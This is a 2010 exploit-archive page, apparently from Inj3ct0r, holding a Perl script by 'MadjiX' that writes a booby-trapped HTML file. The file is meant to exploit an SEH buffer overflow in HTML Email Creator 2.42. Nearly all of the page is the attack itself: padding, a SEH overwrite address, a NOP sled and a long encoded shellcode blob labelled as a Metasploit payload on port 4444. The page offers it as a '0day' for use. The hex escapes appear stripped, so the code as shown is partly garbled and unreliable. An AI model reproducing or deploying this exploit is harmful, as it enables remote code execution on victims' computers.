HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (S

Posted on 29 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================================
HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
===============================================================


########################################################################################
#                                                           _                          #
#                           .-----.--.--.--.----.----.-.---| |                         #
#                           |  _  |  |  |  |     |  -__|  _  |                         #
#                           |   __|________|__|__|_____|_____|                         #
#                           |__|        By MadjiX                                      #
#                                      Sec4ever.com                                    #
########################################################################################
#Title : HTML Email Creator 2.42 build 718 - 0day buffer overflow exploit (SEH)        #
#author : MadjiX &lt;Dz8[]Hotmail{}com&gt;                                                   #
#Gr33tz : His0k4 , Bibi-info , volc4n0                                                 #
#version 2.3 : http://www.exploit-db.com/exploits/9446/ # by flo flow                  #
#version 2.1 : http://www.exploit-db.com/exploits/8401/ # by Dun                       #
########################################################################################
my $file=&quot;madjix.html&quot;;
my $hd2 =&quot;&quot;&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
&quot;;
my $hd1 =&quot;&lt;HTML&gt;
&lt;HEAD&gt;&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;img src=&quot;&quot; ;
my $buff= &quot;x41&quot; x 56 ;
my $nseh=&quot;xebx11x90x90&quot;;
my $seh= pack('V',0x753DE4BD);
my $nops=&quot;x90&quot; x 24;
# http://www.metasploit.com 4444
my $shellcode =
&quot;x56x54x58x36x33x30x56x58x48x34x39x48x48x48&quot; .
&quot;x50x68x59x41x41x51x68x5ax59x59x59x59x41x41&quot; .
&quot;x51x51x44x44x44x64x33x36x46x46x46x46x54x58&quot; .
&quot;x56x6ax30x50x50x54x55x50x50x61x33x30x31x30&quot; .
&quot;x38x39x49x49x49x49x49x49x49x49x49x49x49x49&quot; .
&quot;x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41&quot; .
&quot;x30x41x6bx41x41x51x32x41x42x32x42x42x30x42&quot; .
&quot;x42x41x42x58x50x38x41x42x75x4ax49x49x6cx4a&quot; .
&quot;x48x4fx79x47x70x47x70x45x50x45x30x4ex69x48&quot; .
&quot;x65x50x31x4ax72x51x74x4cx4bx42x72x44x70x4e&quot; .
&quot;x6bx46x32x44x4cx4cx4bx51x42x45x44x4ex6bx51&quot; .
&quot;x62x47x58x44x4fx48x37x50x4ax46x46x50x31x49&quot; .
&quot;x6fx45x61x4bx70x4ex4cx45x6cx43x51x43x4cx45&quot; .
&quot;x52x46x4cx45x70x49x51x48x4fx44x4dx47x71x4f&quot; .
&quot;x37x48x62x48x70x46x32x42x77x4ex6bx42x72x46&quot; .
&quot;x70x4cx4bx51x52x45x6cx43x31x4ax70x4cx4bx47&quot; .
&quot;x30x50x78x4bx35x49x50x51x64x43x7ax46x61x4a&quot; .
&quot;x70x46x30x4cx4bx47x38x47x68x4ex6bx43x68x47&quot; .
&quot;x50x45x51x4ax73x4ax43x47x4cx51x59x4cx4bx50&quot; .
&quot;x34x4cx4bx47x71x48x56x44x71x49x6fx46x51x4f&quot; .
&quot;x30x4cx6cx49x51x48x4fx44x4dx46x61x4fx37x46&quot; .
&quot;x58x49x70x50x75x49x64x43x33x43x4dx49x68x45&quot; .
&quot;x6bx43x4dx51x34x50x75x4ax42x51x48x4ex6bx50&quot; .
&quot;x58x51x34x43x31x4ax73x43x56x4ex6bx44x4cx42&quot; .
&quot;x6bx4ex6bx51x48x45x4cx47x71x48x53x4ex6bx45&quot; .
&quot;x54x4ex6bx45x51x4ax70x4cx49x51x54x45x74x45&quot; .
&quot;x74x43x6bx51x4bx51x71x50x59x43x6ax46x31x49&quot; .
&quot;x6fx49x70x50x58x43x6fx42x7ax4ex6bx44x52x4a&quot; .
&quot;x4bx4fx76x51x4dx51x78x45x63x50x32x47x70x47&quot; .
&quot;x70x50x68x51x67x44x33x46x52x51x4fx50x54x50&quot; .
&quot;x68x42x6cx50x77x47x56x47x77x4bx4fx4ax75x4e&quot; .
&quot;x58x4ex70x46x61x45x50x47x70x46x49x4fx34x50&quot; .
&quot;x54x46x30x50x68x46x49x4dx50x50x6bx45x50x49&quot; .
&quot;x6fx4bx65x50x50x42x70x42x70x42x70x47x30x50&quot; .
&quot;x50x43x70x46x30x43x58x4ax4ax44x4fx49x4fx4b&quot; .
&quot;x50x4bx4fx48x55x4fx79x49x57x43x58x49x50x4d&quot; .
&quot;x78x47x71x47x71x43x58x46x62x43x30x42x31x51&quot; .
&quot;x4cx4cx49x4dx36x43x5ax46x70x42x76x42x77x45&quot; .
&quot;x38x4ax39x4dx75x44x34x51x71x4bx4fx4ex35x51&quot; .
&quot;x78x43x53x50x6dx45x34x43x30x4bx39x48x63x50&quot; .
&quot;x57x43x67x46x37x50x31x4bx46x51x7ax46x72x42&quot; .
&quot;x79x43x66x4dx32x49x6dx45x36x4fx37x50x44x46&quot; .
&quot;x44x47x4cx46x61x46x61x4cx4dx43x74x44x64x42&quot; .
&quot;x30x4ax66x47x70x51x54x51x44x42x70x46x36x42&quot; .
&quot;x76x51x46x43x76x46x36x50x4ex51x46x43x66x51&quot; .
&quot;x43x50x56x51x78x42x59x48x4cx45x6fx4bx36x49&quot; .
&quot;x6fx4ex35x4ex69x4bx50x50x4ex43x66x51x56x4b&quot; .
&quot;x4fx46x50x50x68x46x68x4ex67x47x6dx45x30x4b&quot; .
&quot;x4fx49x45x4fx4bx4ax50x4cx75x4dx72x43x66x43&quot; .
&quot;x58x4dx76x4ex75x4fx4dx4dx4dx4bx4fx4ax75x47&quot; .
&quot;x4cx43x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43&quot; .
&quot;x45x47x75x4fx4bx50x47x46x73x44x32x50x6fx42&quot; .
&quot;x4ax47x70x46x33x49x6fx4ax75x41x41&quot;;
my $m2d=&quot;x42&quot; x 500 ;
open(MYFILE,'&gt;&gt;MadjiX.html');
print MYFILE $hd1.$buff.$nseh.$seh.$nops.$shellcode.$m2d.$hd2;
close(MYFILE);


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20